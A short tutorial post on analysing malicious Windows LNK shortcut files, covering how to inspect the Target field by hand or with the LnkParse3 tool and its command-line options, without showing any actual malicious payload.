Analysis Malicious LNK File

 

Attackers do not always have to use a script armed with multiple malicious codes to achieve their goals and penetrate the other person's system. Instead, they sometimes carry out their attack through a shortcut file known as LNK. In fact, the LNK file structure consists of: target type, target, starin, comment. However, what malware analysts are most concerned about is the target because the target contains the entire malicious code or command that the attacker uses. Attackers and malware developers commonly use LNK files for specific purposes, including:

1. Download another stage of malicious programs.

2. Running a malicious script hosted on a cloud.

3. Running a malicious script.

Analyzing a malicious file like LNK is not too difficult and is actually one of the easiest files to analyze! You can do the analysis without any external tools and you can also do the analysis using the LnkParse3 tool and this script LnkParse3 is one of the easiest scripts to use. In this article, we will discuss the use of both methods so that analysts can always have another option to analyze a malicious file like LNK.

Analysis Process :

1- The first method of analysis (without using external tools): This method is one of the easiest methods to analyze LNK malicious files. All you need to do is have the adulterant file inside your lab VM-LAB . And then right click on the file and then Properties . And then look at the target section and copy the code . As you can clearly see in the picture below.

The second way is to use the LnkParse3 tool. If we define this tool, we can say that this tool is a script used to extract information about the malicious LNK file or any other LNK file. Especially the target, where the whole process depends on the target.

How to download this script :

1. Open the CMD.

2. Type: pip install LnkParse3

3. Then wait for a while until it installs completely.

4. Open the CMD again and type lnkparse and the program will work.

How to use this script : This script has several arguments such as : 

-h, --help show this help message and exit 

-t , --target print target only 

-j, --json print output in JSON 

-c CP, --codepage CP set codepage of ASCII strings 

-a, --all print all extracted data (i.e. offsets and sizes);

What we are working with here are two arguments: --all and --target.

The following figures show the output of the two important options that we use for our analysis process:

--Target Options :

--All Options :